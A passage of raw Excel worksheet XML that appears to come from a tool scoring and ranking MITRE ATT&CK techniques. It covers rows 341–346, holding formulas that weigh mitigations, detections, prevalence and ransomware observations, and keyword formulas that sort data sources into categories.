        <f t="array" ref="AI341">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD341)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ341" s="37">
        <v>337</v>
      </c>
      <c r="AK341" s="37" t="str" cm="1">
        <f t="array" ref="AK341">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD341)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL341" s="37">
        <v>337</v>
      </c>
      <c r="AM341" s="37" t="str" cm="1">
        <f t="array" ref="AM341">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD341)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN341" s="37">
        <v>0</v>
      </c>
      <c r="AO341" s="37">
        <v>4</v>
      </c>
      <c r="AP341" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.43333333333333335</v>
      </c>
      <c r="AQ341" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>794.41111111111104</v>
      </c>
      <c r="AR341" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS341" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AT341" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AU34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75.753439153439146</v>
      </c>
    </row>
    <row r="342" spans="1:47" ht="51">
      <c r="A342" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B342" s="37">
        <f t="shared" si="5"/>
        <v>347.91396357142855</v>
      </c>
      <c r="C342" s="37" t="s">
        <v>1199</v>
      </c>
      <c r="D342" s="50" t="s">
        <v>1195</v>
      </c>
      <c r="E342" s="37" t="s">
        <v>1200</v>
      </c>
      <c r="F342" s="37">
        <v>1</v>
      </c>
      <c r="G342" s="37">
        <v>1</v>
      </c>
      <c r="H342" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I342" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J342" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K342" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L342" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M342" s="37">
        <v>0</v>
      </c>
      <c r="N342" s="56">
        <v>0</v>
      </c>
      <c r="O342" s="56">
        <v>0</v>
      </c>
      <c r="P342" s="56">
        <v>3</v>
      </c>
      <c r="Q342" s="56">
        <v>2</v>
      </c>
      <c r="R342" s="57" t="s">
        <v>1201</v>
      </c>
      <c r="S342" s="57">
        <v>6</v>
      </c>
      <c r="T342" s="57" t="s">
        <v>1202</v>
      </c>
      <c r="U342" s="57">
        <v>8</v>
      </c>
      <c r="V342" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.15714261904761906</v>
      </c>
      <c r="W342" s="37">
        <v>14</v>
      </c>
      <c r="X342" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Y342" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Z342" s="37">
        <v>5</v>
      </c>
      <c r="AA342" s="37">
        <v>0.05</v>
      </c>
      <c r="AB342" s="37">
        <v>0.05</v>
      </c>
      <c r="AC342" s="37"/>
      <c r="AD342" s="50" t="s">
        <v>1203</v>
      </c>
      <c r="AE342" s="37" t="str" cm="1">
        <f t="array" ref="AE342">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD342)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF342" s="37">
        <v>338</v>
      </c>
      <c r="AG342" s="37" t="str" cm="1">
        <f t="array" ref="AG342">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD342)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH342" s="37">
        <v>338</v>
      </c>
      <c r="AI342" s="37" t="str" cm="1">
        <f t="array" ref="AI342">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD342)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ342" s="37">
        <v>338</v>
      </c>
      <c r="AK342" s="37" t="str" cm="1">
        <f t="array" ref="AK342">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD342)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL342" s="37">
        <v>338</v>
      </c>
      <c r="AM342" s="37" t="str" cm="1">
        <f t="array" ref="AM342">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD342)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN342" s="37">
        <v>0</v>
      </c>
      <c r="AO342" s="37">
        <v>0</v>
      </c>
      <c r="AP342" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ342" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>115.97132119047619</v>
      </c>
      <c r="AR342" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS342" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT342" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU34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43" spans="1:47" ht="51">
      <c r="A343" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B343" s="37">
        <f t="shared" si="5"/>
        <v>491.10456804761907</v>
      </c>
      <c r="C343" s="37" t="s">
        <v>1204</v>
      </c>
      <c r="D343" s="50" t="s">
        <v>1195</v>
      </c>
      <c r="E343" s="37" t="s">
        <v>1205</v>
      </c>
      <c r="F343" s="37">
        <v>1</v>
      </c>
      <c r="G343" s="37">
        <v>1</v>
      </c>
      <c r="H343" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I343" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J343" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K343" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L343" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M343" s="37">
        <v>0</v>
      </c>
      <c r="N343" s="56">
        <v>0</v>
      </c>
      <c r="O343" s="56">
        <v>2</v>
      </c>
      <c r="P343" s="56">
        <v>1</v>
      </c>
      <c r="Q343" s="56">
        <v>0</v>
      </c>
      <c r="R343" s="57" t="s">
        <v>1206</v>
      </c>
      <c r="S343" s="57">
        <v>10</v>
      </c>
      <c r="T343" s="57" t="s">
        <v>1207</v>
      </c>
      <c r="U343" s="57">
        <v>16</v>
      </c>
      <c r="V343" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.26190461904761908</v>
      </c>
      <c r="W343" s="37">
        <v>26</v>
      </c>
      <c r="X343" s="37">
        <v>0.47272700000000001</v>
      </c>
      <c r="Y343" s="37">
        <v>0.47272700000000001</v>
      </c>
      <c r="Z343" s="37">
        <v>3</v>
      </c>
      <c r="AA343" s="37">
        <v>0.03</v>
      </c>
      <c r="AB343" s="37">
        <v>0.03</v>
      </c>
      <c r="AC343" s="37"/>
      <c r="AD343" s="50" t="s">
        <v>1208</v>
      </c>
      <c r="AE343" s="37" t="str" cm="1">
        <f t="array" ref="AE343">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD343)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF343" s="37">
        <v>339</v>
      </c>
      <c r="AG343" s="37" t="str" cm="1">
        <f t="array" ref="AG343">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD343)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH343" s="37">
        <v>339</v>
      </c>
      <c r="AI343" s="37" t="str" cm="1">
        <f t="array" ref="AI343">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD343)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ343" s="37">
        <v>339</v>
      </c>
      <c r="AK343" s="37" t="str" cm="1">
        <f t="array" ref="AK343">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD343)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL343" s="37">
        <v>339</v>
      </c>
      <c r="AM343" s="37" t="str" cm="1">
        <f t="array" ref="AM343">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD343)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN343" s="37">
        <v>0</v>
      </c>
      <c r="AO343" s="37">
        <v>0</v>
      </c>
      <c r="AP343" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ343" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>163.70152268253969</v>
      </c>
      <c r="AR343" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS343" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT343" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU34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44" spans="1:47" ht="102">
      <c r="A344" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B344" s="37">
        <f t="shared" si="5"/>
        <v>810.11911242857138</v>
      </c>
      <c r="C344" s="37" t="s">
        <v>1209</v>
      </c>
      <c r="D344" s="50" t="s">
        <v>1195</v>
      </c>
      <c r="E344" s="37" t="s">
        <v>1210</v>
      </c>
      <c r="F344" s="37">
        <v>1</v>
      </c>
      <c r="G344" s="37">
        <v>1</v>
      </c>
      <c r="H344" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I344" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J344" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K344" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L344" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M344" s="37">
        <v>0</v>
      </c>
      <c r="N344" s="56">
        <v>6</v>
      </c>
      <c r="O344" s="56">
        <v>40</v>
      </c>
      <c r="P344" s="56">
        <v>10</v>
      </c>
      <c r="Q344" s="56">
        <v>14</v>
      </c>
      <c r="R344" s="57" t="s">
        <v>1033</v>
      </c>
      <c r="S344" s="57">
        <v>9</v>
      </c>
      <c r="T344" s="57" t="s">
        <v>1202</v>
      </c>
      <c r="U344" s="57">
        <v>8</v>
      </c>
      <c r="V344" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.49523814285714285</v>
      </c>
      <c r="W344" s="37">
        <v>17</v>
      </c>
      <c r="X344" s="37">
        <v>0.309091</v>
      </c>
      <c r="Y344" s="37">
        <v>0.309091</v>
      </c>
      <c r="Z344" s="37">
        <v>70</v>
      </c>
      <c r="AA344" s="37">
        <v>0.7</v>
      </c>
      <c r="AB344" s="37">
        <v>0.7</v>
      </c>
      <c r="AC344" s="37"/>
      <c r="AD344" s="50" t="s">
        <v>1211</v>
      </c>
      <c r="AE344" s="37" t="str" cm="1">
        <f t="array" ref="AE344">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD344)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF344" s="37">
        <v>340</v>
      </c>
      <c r="AG344" s="37" t="str" cm="1">
        <f t="array" ref="AG344">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD344)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH344" s="37">
        <v>340</v>
      </c>
      <c r="AI344" s="37" t="str" cm="1">
        <f t="array" ref="AI344">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD344)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ344" s="37">
        <v>340</v>
      </c>
      <c r="AK344" s="37" t="str" cm="1">
        <f t="array" ref="AK344">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD344)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL344" s="37">
        <v>340</v>
      </c>
      <c r="AM344" s="37" t="str" cm="1">
        <f t="array" ref="AM344">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD344)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN344" s="37">
        <v>0</v>
      </c>
      <c r="AO344" s="37">
        <v>2</v>
      </c>
      <c r="AP344" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ344" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>270.03970414285715</v>
      </c>
      <c r="AR344" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS344" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT344" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU34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12.906652578231292</v>
      </c>
    </row>
    <row r="345" spans="1:47" ht="51">
      <c r="A345" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B345" s="37">
        <f t="shared" si="5"/>
        <v>318.49967500000002</v>
      </c>
      <c r="C345" s="37" t="s">
        <v>1212</v>
      </c>
      <c r="D345" s="50" t="s">
        <v>1195</v>
      </c>
      <c r="E345" s="37" t="s">
        <v>1213</v>
      </c>
      <c r="F345" s="37">
        <v>1</v>
      </c>
      <c r="G345" s="37">
        <v>1</v>
      </c>
      <c r="H345" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I345" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J345" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K345" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L345" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M345" s="37">
        <v>0</v>
      </c>
      <c r="N345" s="56">
        <v>0</v>
      </c>
      <c r="O345" s="56">
        <v>0</v>
      </c>
      <c r="P345" s="56">
        <v>0</v>
      </c>
      <c r="Q345" s="56">
        <v>0</v>
      </c>
      <c r="R345" s="57" t="s">
        <v>1201</v>
      </c>
      <c r="S345" s="57">
        <v>6</v>
      </c>
      <c r="T345" s="57" t="s">
        <v>1202</v>
      </c>
      <c r="U345" s="57">
        <v>8</v>
      </c>
      <c r="V345" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.13333309523809525</v>
      </c>
      <c r="W345" s="37">
        <v>14</v>
      </c>
      <c r="X345" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Y345" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Z345" s="37">
        <v>0</v>
      </c>
      <c r="AA345" s="37">
        <v>0</v>
      </c>
      <c r="AB345" s="37">
        <v>0</v>
      </c>
      <c r="AC345" s="37"/>
      <c r="AD345" s="50" t="s">
        <v>1208</v>
      </c>
      <c r="AE345" s="37" t="str" cm="1">
        <f t="array" ref="AE345">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD345)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF345" s="37">
        <v>341</v>
      </c>
      <c r="AG345" s="37" t="str" cm="1">
        <f t="array" ref="AG345">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD345)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH345" s="37">
        <v>341</v>
      </c>
      <c r="AI345" s="37" t="str" cm="1">
        <f t="array" ref="AI345">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD345)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ345" s="37">
        <v>341</v>
      </c>
      <c r="AK345" s="37" t="str" cm="1">
        <f t="array" ref="AK345">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD345)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL345" s="37">
        <v>341</v>
      </c>
      <c r="AM345" s="37" t="str" cm="1">
        <f t="array" ref="AM345">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD345)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN345" s="37">
        <v>0</v>
      </c>
      <c r="AO345" s="37">
        <v>0</v>
      </c>
      <c r="AP345" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ345" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>106.16655833333334</v>
      </c>
      <c r="AR345" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS345" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT345" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU34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46" spans="1:47" ht="85">
      <c r="A346" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B346" s="37">
        <f t="shared" si="5"/>
        <v>911.00841652380939</v>
      </c>
      <c r="C346" s="37" t="s">
        <v>1214</v>
      </c>
      <c r="D346" s="50" t="s">
        <v>1215</v>
      </c>
      <c r="E346" s="37"/>
      <c r="F346" s="37">
        <v>3</v>
      </c>
      <c r="G346" s="37">
        <v>1</v>
      </c>
      <c r="H346" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.2</v>
      </c>
      <c r="I346" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.3</v>
      </c>
      <c r="J346" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="K346" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L346" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M346" s="37">
        <v>0.241646</v>
      </c>
      <c r="N346" s="56">
        <v>0</v>
      </c>
      <c r="O346" s="56">
        <v>9</v>
      </c>
      <c r="P346" s="56">
        <v>15</v>
      </c>
      <c r="Q346" s="56">
        <v>15</v>
      </c>
      <c r="R346" s="57"/>
      <c r="S346" s="57">
        <v>0</v>
      </c>
      <c r="T346" s="57" t="s">
        <v>1216</v>
      </c>
      <c r="U346" s="57">
        <v>4</v>
      </c>
      <c r="V346" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.22380938095238095</v>
      </c>
      <c r="W346" s="37">
        <v>4</v>
      </c>
      <c r="X346" s="37">
        <v>7.2727E-2</v>
      </c>
      <c r="Y346" s="37">
        <v>7.2727E-2</v>
      </c>
      <c r="Z346" s="37">
        <v>39</v>
      </c>
      <c r="AA346" s="37">
        <v>0.39</v>
      </c>
      <c r="AB346" s="37">
        <v>0.39</v>
      </c>
      <c r="AC346" s="37"/>
      <c r="AD346" s="50" t="s">
        <v>1217</v>
      </c>
      <c r="AE346" s="37" t="str" cm="1">
        <f t="array" ref="AE346">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD346)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF346" s="37">
        <v>342</v>
      </c>
      <c r="AG346" s="37" t="str" cm="1">
        <f t="array" ref="AG346">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD346)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH346" s="37">
        <v>342</v>
      </c>
      <c r="AI346" s="37" t="str" cm="1">
        <f t="array" ref="AI346">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD346)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ346" s="37">
        <v>342</v>
      </c>
      <c r="AK346" s="37" t="str" cm="1">
        <f t="array" ref="AK346">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD346)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AL346" s="37">
        <v>342</v>
      </c>
      <c r="AM346" s="37" t="str" cm="1">
        <f t="array" ref="AM346">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD346)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN346" s="37">
        <v>0</v>
      </c>
      <c r="AO346" s="37">
        <v>0</v>
      </c>
      <c r="AP346" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ346" s="37">
